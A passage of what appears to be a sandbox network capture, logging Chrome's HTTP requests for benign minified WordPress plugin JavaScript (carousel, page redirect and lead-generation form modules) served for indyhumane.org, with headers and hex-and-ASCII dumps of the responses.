                                                                                                                                                                                                                                                        2025-01-09 01:59:12 UTC1369INData Raw: 61 72 65 6e 74 28 29 2c 65 2e 24 6c 69 73 74 3d 65 2e 24 73 6c 69 64 65 54 72 61 63 6b 2e 77 72 61 70 28 27 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6c 69 63 6b 2d 6c 69 73 74 22 2f 3e 27 29 2e 70 61 72 65 6e 74 28 29 2c 65 2e 24 73 6c 69 64 65 54 72 61 63 6b 2e 63 73 73 28 22 6f 70 61 63 69 74 79 22 2c 30 29 2c 21 30 21 3d 3d 65 2e 6f 70 74 69 6f 6e 73 2e 63 65 6e 74 65 72 4d 6f 64 65 26 26 21 30 21 3d 3d 65 2e 6f 70 74 69 6f 6e 73 2e 73 77 69 70 65 54 6f 53 6c 69 64 65 7c 7c 28 65 2e 6f 70 74 69 6f 6e 73 2e 73 6c 69 64 65 73 54 6f 53 63 72 6f 6c 6c 3d 31 29 2c 69 28 22 69 6d 67 5b 64 61 74 61 2d 6c 61 7a 79 5d 22 2c 65 2e 24 73 6c 69 64 65 72 29 2e 6e 6f 74 28 22 5b 73 72 63 5d 22 29 2e 61 64 64 43 6c 61 73 73 28 22 73 6c 69 63 6b 2d 6c 6f 61 64 69 6e 67
                                                                                                                                                                                                                                                        Data Ascii: arent(),e.$list=e.$slideTrack.wrap('<div class="slick-list"/>').parent(),e.$slideTrack.css("opacity",0),!0!==e.options.centerMode&&!0!==e.options.swipeToSlide||(e.options.slidesToScroll=1),i("img[data-lazy]",e.$slider).not("[src]").addClass("slick-loading
                                                                                                                                                                                                                                                        2025-01-09 01:59:12 UTC1369INData Raw: 62 72 65 61 6b 70 6f 69 6e 74 73 29 72 2e 62 72 65 61 6b 70 6f 69 6e 74 73 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 28 6f 29 26 26 28 21 31 3d 3d 3d 72 2e 6f 72 69 67 69 6e 61 6c 53 65 74 74 69 6e 67 73 2e 6d 6f 62 69 6c 65 46 69 72 73 74 3f 6e 3c 72 2e 62 72 65 61 6b 70 6f 69 6e 74 73 5b 6f 5d 26 26 28 73 3d 72 2e 62 72 65 61 6b 70 6f 69 6e 74 73 5b 6f 5d 29 3a 6e 3e 72 2e 62 72 65 61 6b 70 6f 69 6e 74 73 5b 6f 5d 26 26 28 73 3d 72 2e 62 72 65 61 6b 70 6f 69 6e 74 73 5b 6f 5d 29 29 3b 6e 75 6c 6c 21 3d 3d 73 3f 6e 75 6c 6c 21 3d 3d 72 2e 61 63 74 69 76 65 42 72 65 61 6b 70 6f 69 6e 74 3f 28 73 21 3d 3d 72 2e 61 63 74 69 76 65 42 72 65 61 6b 70 6f 69 6e 74 7c 7c 74 29 26 26 28 72 2e 61 63 74 69 76 65 42 72 65 61 6b 70 6f 69 6e 74 3d 73 2c 22 75 6e 73
                                                                                                                                                                                                                                                        Data Ascii: breakpoints)r.breakpoints.hasOwnProperty(o)&&(!1===r.originalSettings.mobileFirst?n<r.breakpoints[o]&&(s=r.breakpoints[o]):n>r.breakpoints[o]&&(s=r.breakpoints[o]));null!==s?null!==r.activeBreakpoint?(s!==r.activeBreakpoint||t)&&(r.activeBreakpoint=s,"uns
                                                                                                                                                                                                                                                        2025-01-09 01:59:12 UTC1369INData Raw: 29 3b 62 72 65 61 6b 3b 63 61 73 65 22 69 6e 64 65 78 22 3a 76 61 72 20 6c 3d 30 3d 3d 3d 65 2e 64 61 74 61 2e 69 6e 64 65 78 3f 30 3a 65 2e 64 61 74 61 2e 69 6e 64 65 78 7c 7c 72 2e 69 6e 64 65 78 28 29 2a 6e 2e 6f 70 74 69 6f 6e 73 2e 73 6c 69 64 65 73 54 6f 53 63 72 6f 6c 6c 3b 6e 2e 73 6c 69 64 65 48 61 6e 64 6c 65 72 28 6e 2e 63 68 65 63 6b 4e 61 76 69 67 61 62 6c 65 28 6c 29 2c 21 31 2c 74 29 2c 72 2e 63 68 69 6c 64 72 65 6e 28 29 2e 74 72 69 67 67 65 72 28 22 66 6f 63 75 73 22 29 3b 62 72 65 61 6b 3b 64 65 66 61 75 6c 74 3a 72 65 74 75 72 6e 7d 7d 2c 74 2e 70 72 6f 74 6f 74 79 70 65 2e 63 68 65 63 6b 4e 61 76 69 67 61 62 6c 65 3d 66 75 6e 63 74 69 6f 6e 28 69 29 7b 76 61 72 20 65 2c 74 3b 69 66 28 74 3d 30 2c 69 3e 28 65 3d 74 68 69 73 2e 67 65 74
                                                                                                                                                                                                                                                        Data Ascii: );break;case"index":var l=0===e.data.index?0:e.data.index||r.index()*n.options.slidesToScroll;n.slideHandler(n.checkNavigable(l),!1,t),r.children().trigger("focus");break;default:return}},t.prototype.checkNavigable=function(i){var e,t;if(t=0,i>(e=this.get
                                                                                                                                                                                                                                                        2025-01-09 01:59:12 UTC1369INData Raw: 76 69 73 69 62 69 6c 69 74 79 29 2c 65 2e 63 6c 65 61 6e 55 70 53 6c 69 64 65 45 76 65 6e 74 73 28 29 2c 21 30 3d 3d 3d 65 2e 6f 70 74 69 6f 6e 73 2e 61 63 63 65 73 73 69 62 69 6c 69 74 79 26 26 65 2e 24 6c 69 73 74 2e 6f 66 66 28 22 6b 65 79 64 6f 77 6e 2e 73 6c 69 63 6b 22 2c 65 2e 6b 65 79 48 61 6e 64 6c 65 72 29 2c 21 30 3d 3d 3d 65 2e 6f 70 74 69 6f 6e 73 2e 66 6f 63 75 73 4f 6e 53 65 6c 65 63 74 26 26 69 28 65 2e 24 73 6c 69 64 65 54 72 61 63 6b 29 2e 63 68 69 6c 64 72 65 6e 28 29 2e 6f 66 66 28 22 63 6c 69 63 6b 2e 73 6c 69 63 6b 22 2c 65 2e 73 65 6c 65 63 74 48 61 6e 64 6c 65 72 29 2c 69 28 77 69 6e 64 6f 77 29 2e 6f 66 66 28 22 6f 72 69 65 6e 74 61 74 69 6f 6e 63 68 61 6e 67 65 2e 73 6c 69 63 6b 2e 73 6c 69 63 6b 2d 22 2b 65 2e 69 6e 73 74 61 6e
                                                                                                                                                                                                                                                        Data Ascii: visibility),e.cleanUpSlideEvents(),!0===e.options.accessibility&&e.$list.off("keydown.slick",e.keyHandler),!0===e.options.focusOnSelect&&i(e.$slideTrack).children().off("click.slick",e.selectHandler),i(window).off("orientationchange.slick.slick-"+e.instan


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        45192.168.2.449797192.0.77.394432044C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2025-01-09 01:59:12 UTC617OUTGET /wp-content/plugins/quick-pagepost-redirect-plugin/js/qppr_frontend_script.min.js?ver=5.2.4 HTTP/1.1
                                                                                                                                                                                                                                                        Host: 149955744.v2.pressablecdn.com
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                        Referer: https://indyhumane.org/
                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                        2025-01-09 01:59:12 UTC671INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                        Date: Thu, 09 Jan 2025 01:59:12 GMT
                                                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                                                        Content-Length: 1590
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Link: <http://indyhumane.org/wp-content/plugins/quick-pagepost-redirect-plugin/js/qppr_frontend_script.min.js>; rel="canonical"
                                                                                                                                                                                                                                                        Last-Modified: Fri, 13 Sep 2024 18:47:23 GMT
                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                        Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                                                                                                                                                                                                                                        Cache-Control: max-age=315360000
                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                        Access-Control-Allow-Methods: GET, HEAD
                                                                                                                                                                                                                                                        X-ac: 2.jfk _atomic_dca MISS
                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=15552000
                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                        X-nc: MISS jfk 1
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                        2025-01-09 01:59:12 UTC698INData Raw: 3b 28 66 75 6e 63 74 69 6f 6e 28 24 29 7b 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 65 77 57 69 6e 64 6f 77 41 72 72 3d 71 70 70 72 46 72 6f 6e 74 44 61 74 61 2e 6c 69 6e 6b 44 61 74 61 3b 76 61 72 20 72 6f 6f 74 3d 71 70 70 72 46 72 6f 6e 74 44 61 74 61 2e 73 69 74 65 55 52 4c 3b 76 61 72 20 71 72 6f 6f 74 3d 71 70 70 72 46 72 6f 6e 74 44 61 74 61 2e 73 69 74 65 55 52 4c 71 3b 24 28 27 61 5b 68 72 65 66 5d 27 29 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 68 69 73 4d 61 74 63 68 3d 24 28 74 68 69 73 29 3b 76 61 72 20 68 72 65 66 3d 74 79 70 65 6f 66 20 24 28 74 68 69 73 29 2e 61 74 74 72 28 27 68 72 65 66 27 29 21 3d 3d 27 75 6e 64 65 66 69 6e 65 64 27 3f 24 28 74 68 69 73
                                                                                                                                                                                                                                                        Data Ascii: ;(function($){$(document).ready(function(){var newWindowArr=qpprFrontData.linkData;var root=qpprFrontData.siteURL;var qroot=qpprFrontData.siteURLq;$('a[href]').each(function(){var thisMatch=$(this);var href=typeof $(this).attr('href')!=='undefined'?$(this
                                                                                                                                                                                                                                                        2025-01-09 01:59:12 UTC892INData Raw: 70 6c 61 63 65 28 72 6f 6f 74 2c 27 27 29 5d 5b 30 5d 3b 64 6f 4e 46 3d 6e 65 77 57 69 6e 64 6f 77 41 72 72 5b 68 72 65 66 2e 72 65 70 6c 61 63 65 28 72 6f 6f 74 2c 27 27 29 5d 5b 31 5d 3b 72 55 52 4c 3d 6e 65 77 57 69 6e 64 6f 77 41 72 72 5b 68 72 65 66 2e 72 65 70 6c 61 63 65 28 72 6f 6f 74 2c 27 27 29 5d 5b 32 5d 3b 68 43 68 6b 3d 68 72 65 66 2e 72 65 70 6c 61 63 65 28 72 6f 6f 74 2c 27 27 29 3b 7d 65 6c 73 65 20 69 66 28 6c 69 6e 6b 46 6f 75 6e 64 3d 3d 27 33 27 29 7b 64 6f 4e 57 3d 6e 65 77 57 69 6e 64 6f 77 41 72 72 5b 68 72 65 66 2e 72 65 70 6c 61 63 65 28 71 72 6f 6f 74 2c 27 27 29 5d 5b 30 5d 3b 64 6f 4e 46 3d 6e 65 77 57 69 6e 64 6f 77 41 72 72 5b 68 72 65 66 2e 72 65 70 6c 61 63 65 28 71 72 6f 6f 74 2c 27 27 29 5d 5b 31 5d 3b 72 55 52 4c 3d 6e
                                                                                                                                                                                                                                                        Data Ascii: place(root,'')][0];doNF=newWindowArr[href.replace(root,'')][1];rURL=newWindowArr[href.replace(root,'')][2];hChk=href.replace(root,'');}else if(linkFound=='3'){doNW=newWindowArr[href.replace(qroot,'')][0];doNF=newWindowArr[href.replace(qroot,'')][1];rURL=n


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        46192.168.2.449793192.0.77.394432044C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2025-01-09 01:59:12 UTC625OUTGET /wp-content/plugins/thrive-visual-editor/editor/js/dist/modules/carousel.min.js?v=10.4.2&ver=10.4.2 HTTP/1.1
                                                                                                                                                                                                                                                        Host: 149955744.v2.pressablecdn.com
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                        Referer: https://indyhumane.org/
                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                        2025-01-09 01:59:12 UTC669INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                        Date: Thu, 09 Jan 2025 01:59:12 GMT
                                                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                                                        Content-Length: 4161
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Link: <http://indyhumane.org/wp-content/plugins/thrive-visual-editor/editor/js/dist/modules/carousel.min.js>; rel="canonical"
                                                                                                                                                                                                                                                        Last-Modified: Sun, 15 Dec 2024 01:15:24 GMT
                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                        Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                                                                                                                                                                                                                                        Cache-Control: max-age=315360000
                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                        Access-Control-Allow-Methods: GET, HEAD
                                                                                                                                                                                                                                                        X-ac: 1.jfk _atomic_dca MISS
                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=15552000
                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                        X-nc: MISS jfk 1
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                        2025-01-09 01:59:12 UTC700INData Raw: 28 28 29 3d 3e 7b 76 61 72 20 74 3d 7b 39 34 31 38 35 3a 74 3d 3e 7b 76 6f 69 64 20 30 3d 3d 3d 54 43 42 5f 46 72 6f 6e 74 2e 6a 73 5f 6d 6f 64 75 6c 65 73 2e 63 61 72 6f 75 73 65 6c 26 26 54 43 42 5f 46 72 6f 6e 74 2e 73 65 74 4d 6f 64 75 6c 65 4c 6f 61 64 65 64 53 74 61 74 75 73 28 22 63 61 72 6f 75 73 65 6c 22 2c 21 31 29 2c 66 75 6e 63 74 69 6f 6e 28 73 2c 65 29 7b 69 66 28 54 43 42 5f 46 72 6f 6e 74 2e 69 73 4d 6f 64 75 6c 65 4c 6f 61 64 65 64 28 22 63 61 72 6f 75 73 65 6c 22 29 29 72 65 74 75 72 6e 3b 63 6f 6e 73 74 20 69 3d 7b 74 61 62 6c 65 74 3a 31 30 32 33 2c 6d 6f 62 69 6c 65 3a 37 36 37 7d 3b 63 6c 61 73 73 20 6f 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 74 29 7b 74 68 69 73 2e 63 61 72 6f 75 73 65 6c 3d 74 2c 74 68 69 73 2e 24 63 61 72 6f 75 73
                                                                                                                                                                                                                                                        Data Ascii: (()=>{var t={94185:t=>{void 0===TCB_Front.js_modules.carousel&&TCB_Front.setModuleLoadedStatus("carousel",!1),function(s,e){if(TCB_Front.isModuleLoaded("carousel"))return;const i={tablet:1023,mobile:767};class o{constructor(t){this.carousel=t,this.$carous
                                                                                                                                                                                                                                                        2025-01-09 01:59:12 UTC1369INData Raw: 28 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 74 2e 72 65 73 70 6f 6e 73 69 76 65 29 29 5b 22 74 61 62 6c 65 74 22 3d 3d 3d 65 3f 30 3a 31 5d 3b 6c 65 74 20 61 3b 72 65 74 75 72 6e 20 61 3d 22 64 65 73 6b 74 6f 70 22 21 3d 3d 65 26 26 6f 26 26 6f 2e 62 72 65 61 6b 70 6f 69 6e 74 3d 3d 3d 69 5b 65 5d 26 26 76 6f 69 64 20 30 21 3d 3d 6f 2e 73 65 74 74 69 6e 67 73 5b 73 5d 3f 6f 2e 73 65 74 74 69 6e 67 73 5b 73 5d 3a 74 5b 73 5d 2c 61 7d 73 74 61 74 69 63 20 73 65 74 44 6f 74 73 28 74 2c 73 29 7b 63 6f 6e 73 74 20 65 3d 74 2e 70 61 72 65 6e 74 73 28 27 2e 74 63 62 2d 69 6d 61 67 65 2d 67 61 6c 6c 65 72 79 2c 5b 64 61 74 61 2d 74 79 70 65 3d 22 63 61 72 6f 75 73 65 6c 22 5d 27 29 3b 73 26 26 28 74 2e 6c 65 6e 67 74 68 26 26 30 3d 3d 3d 65 2e 66 69 6e 64 28
                                                                                                                                                                                                                                                        Data Ascii: (JSON.stringify(t.responsive))["tablet"===e?0:1];let a;return a="desktop"!==e&&o&&o.breakpoint===i[e]&&void 0!==o.settings[s]?o.settings[s]:t[s],a}static setDots(t,s){const e=t.parents('.tcb-image-gallery,[data-type="carousel"]');s&&(t.length&&0===e.find(
                                                                                                                                                                                                                                                        2025-01-09 01:59:12 UTC1369INData Raw: 2d 6c 69 73 74 22 2c 28 28 29 3d 3e 7b 64 65 6c 65 74 65 20 74 68 69 73 2e 43 41 52 4f 55 53 45 4c 5f 46 4f 43 55 53 2c 73 65 74 54 69 6d 65 6f 75 74 28 28 28 29 3d 3e 7b 74 68 69 73 2e 24 63 61 72 6f 75 73 65 6c 2e 66 69 6e 64 28 6f 2e 65 6c 65 6d 65 6e 74 73 57 69 74 68 4c 69 6e 6b 73 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 22 74 63 62 2d 64 75 72 69 6e 67 2d 64 72 61 67 22 29 7d 29 2c 35 30 29 7d 29 29 7d 69 6e 69 74 43 61 72 6f 75 73 65 6c 28 74 3d 21 31 29 7b 63 6f 6e 73 74 20 69 3d 74 68 69 73 2e 24 63 61 72 6f 75 73 65 6c 2e 66 69 6e 64 28 6f 2e 63 61 72 6f 75 73 65 6c 43 6f 6e 74 61 69 6e 65 72 53 65 6c 65 63 74 6f 72 29 2c 61 3d 65 2e 55 74 69 6c 73 2e 6a 73 6f 6e 50 61 72 73 65 28 69 2c 22 64 61 74 61 2d 63 61 72 6f 75 73 65 6c 2d 73 65 74 74
                                                                                                                                                                                                                                                        Data Ascii: -list",(()=>{delete this.CAROUSEL_FOCUS,setTimeout((()=>{this.$carousel.find(o.elementsWithLinks).removeClass("tcb-during-drag")}),50)}))}initCarousel(t=!1){const i=this.$carousel.find(o.carouselContainerSelector),a=e.Utils.jsonParse(i,"data-carousel-sett
                                                                                                                                                                                                                                                        2025-01-09 01:59:12 UTC723INData Raw: 6c 65 63 74 6f 72 29 2e 65 61 63 68 28 28 28 74 2c 69 29 3d 3e 7b 63 6f 6e 73 74 20 61 3d 73 28 69 29 2c 6c 3d 65 2e 55 74 69 6c 73 2e 6a 73 6f 6e 50 61 72 73 65 28 61 2e 66 69 6e 64 28 6f 2e 63 61 72 6f 75 73 65 6c 43 6f 6e 74 61 69 6e 65 72 53 65 6c 65 63 74 6f 72 29 2c 22 64 61 74 61 2d 63 61 72 6f 75 73 65 6c 2d 73 65 74 74 69 6e 67 73 22 29 2c 72 3d 61 2e 68 61 73 43 6c 61 73 73 28 22 74 63 62 2d 67 61 6c 6c 65 72 79 2d 63 72 6f 70 22 29 3b 6f 2e 73 65 74 44 6f 74 73 28 61 2e 66 69 6e 64 28 22 75 6c 2e 74 63 62 2d 63 61 72 6f 75 73 65 6c 2d 64 6f 74 73 22 29 2c 6c 2e 74 63 62 44 6f 74 73 29 2c 74 68 69 73 2e 69 73 45 64 69 74 6f 72 26 26 72 26 26 54 56 45 2e 43 6f 6d 70 6f 6e 65 6e 74 73 2e 69 6d 61 67 65 5f 67 61 6c 6c 65 72 79 2e 63 72 6f 70 49 6d
                                                                                                                                                                                                                                                        Data Ascii: lector).each(((t,i)=>{const a=s(i),l=e.Utils.jsonParse(a.find(o.carouselContainerSelector),"data-carousel-settings"),r=a.hasClass("tcb-gallery-crop");o.setDots(a.find("ul.tcb-carousel-dots"),l.tcbDots),this.isEditor&&r&&TVE.Components.image_gallery.cropIm


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        47192.168.2.449795192.0.77.394432044C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2025-01-09 01:59:12 UTC632OUTGET /wp-content/plugins/thrive-visual-editor/editor/js/dist/modules/lead-generation.min.js?v=10.4.2&ver=10.4.2 HTTP/1.1
                                                                                                                                                                                                                                                        Host: 149955744.v2.pressablecdn.com
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                        Referer: https://indyhumane.org/
                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                        2025-01-09 01:59:12 UTC677INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                        Date: Thu, 09 Jan 2025 01:59:12 GMT
                                                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                                                        Content-Length: 22652
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Link: <http://indyhumane.org/wp-content/plugins/thrive-visual-editor/editor/js/dist/modules/lead-generation.min.js>; rel="canonical"
                                                                                                                                                                                                                                                        Last-Modified: Sun, 15 Dec 2024 01:15:24 GMT
                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                        Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                                                                                                                                                                                                                                        Cache-Control: max-age=315360000
                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                        Access-Control-Allow-Methods: GET, HEAD
                                                                                                                                                                                                                                                        X-ac: 1.jfk _atomic_dca MISS
                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=15552000
                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                        X-nc: MISS jfk 1
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                        2025-01-09 01:59:12 UTC692INData Raw: 76 6f 69 64 20 30 3d 3d 3d 54 43 42 5f 46 72 6f 6e 74 2e 6a 73 5f 6d 6f 64 75 6c 65 73 5b 22 6c 65 61 64 2d 67 65 6e 65 72 61 74 69 6f 6e 22 5d 26 26 54 43 42 5f 46 72 6f 6e 74 2e 73 65 74 4d 6f 64 75 6c 65 4c 6f 61 64 65 64 53 74 61 74 75 73 28 22 6c 65 61 64 2d 67 65 6e 65 72 61 74 69 6f 6e 22 2c 21 31 29 2c 28 28 74 2c 65 29 3d 3e 7b 69 66 28 65 2e 69 73 4d 6f 64 75 6c 65 4c 6f 61 64 65 64 28 22 6c 65 61 64 2d 67 65 6e 65 72 61 74 69 6f 6e 22 29 29 72 65 74 75 72 6e 3b 74 28 77 69 6e 64 6f 77 29 2e 6f 6e 28 22 74 63 62 5f 61 66 74 65 72 5f 64 6f 6d 5f 72 65 61 64 79 22 2c 28 28 29 3d 3e 7b 63 6f 6e 73 74 20 72 3d 74 28 65 2e 55 74 69 6c 73 2e 69 73 45 64 69 74 6f 72 50 61 67 65 28 29 3f 22 23 74 76 65 5f 65 64 69 74 6f 72 22 3a 22 62 6f 64 79 22 29 3b
                                                                                                                                                                                                                                                        Data Ascii: void 0===TCB_Front.js_modules["lead-generation"]&&TCB_Front.setModuleLoadedStatus("lead-generation",!1),((t,e)=>{if(e.isModuleLoaded("lead-generation"))return;t(window).on("tcb_after_dom_ready",(()=>{const r=t(e.Utils.isEditorPage()?"#tve_editor":"body");
                                                                                                                                                                                                                                                        2025-01-09 01:59:12 UTC1369INData Raw: 69 6f 5f 77 72 61 70 70 65 72 22 29 3b 65 2e 73 69 62 6c 69 6e 67 73 28 22 2e 74 76 65 2d 73 74 61 74 65 2d 65 78 70 61 6e 64 65 64 22 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 22 74 76 65 2d 73 74 61 74 65 2d 65 78 70 61 6e 64 65 64 22 29 2c 65 2e 61 64 64 43 6c 61 73 73 28 22 74 76 65 2d 73 74 61 74 65 2d 65 78 70 61 6e 64 65 64 22 29 7d 29 29 7d 2c 69 6e 69 74 43 68 65 63 6b 62 6f 78 49 6e 70 75 74 73 28 65 29 7b 65 2e 6f 66 66 28 22 63 68 61 6e 67 65 2e 69 6e 70 75 74 63 68 65 63 6b 62 6f 78 22 29 2e 6f 6e 28 22 63 68 61 6e 67 65 2e 69 6e 70 75 74 63 68 65 63 6b 62 6f 78 22 2c 22 2e 74 76 65 5f 6c 67 5f 63 68 65 63 6b 62 6f 78 5f 77 72 61 70 70 65 72 20 69 6e 70 75 74 22 2c 28 66 75 6e 63 74 69 6f 6e 28 29 7b 63 6f 6e 73 74 20 65 3d 74 28 74 68 69 73
                                                                                                                                                                                                                                                        Data Ascii: io_wrapper");e.siblings(".tve-state-expanded").removeClass("tve-state-expanded"),e.addClass("tve-state-expanded")}))},initCheckboxInputs(e){e.off("change.inputcheckbox").on("change.inputcheckbox",".tve_lg_checkbox_wrapper input",(function(){const e=t(this
                                                                                                                                                                                                                                                        2025-01-09 01:59:12 UTC1369INData Raw: 74 61 2d 73 69 74 65 2d 6b 65 79 22 29 2c 74 68 65 6d 65 3a 65 2e 61 74 74 72 28 22 64 61 74 61 2d 74 68 65 6d 65 22 29 2c 74 79 70 65 3a 65 2e 61 74 74 72 28 22 64 61 74 61 2d 74 79 70 65 22 29 2c 61 70 70 65 61 72 61 6e 63 65 3a 22 65 78 65 63 75 74 65 22 2c 73 69 7a 65 3a 72 7d 29 29 7d 7d 29 29 7d 28 29 3a 73 65 74 54 69 6d 65 6f 75 74 28 61 2c 35 30 29 7d 28 29 7d 7d 2c 69 6e 69 74 52 65 63 61 70 74 63 68 61 28 29 7b 63 6f 6e 73 74 20 65 3d 74 28 22 2e 74 76 65 2d 63 61 70 74 63 68 61 2d 63 6f 6e 74 61 69 6e 65 72 22 29 3b 69 66 28 65 2e 6c 65 6e 67 74 68 26 26 30 21 3d 3d 74 76 65 5f 64 61 73 68 5f 66 72 6f 6e 74 2e 72 65 63 61 70 74 63 68 61 2e 6c 65 6e 67 74 68 29 7b 66 75 6e 63 74 69 6f 6e 20 61 28 29 7b 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74
                                                                                                                                                                                                                                                        Data Ascii: ta-site-key"),theme:e.attr("data-theme"),type:e.attr("data-type"),appearance:"execute",size:r}))}}))}():setTimeout(a,50)}()}},initRecaptcha(){const e=t(".tve-captcha-container");if(e.length&&0!==tve_dash_front.recaptcha.length){function a(){"undefined"!=t
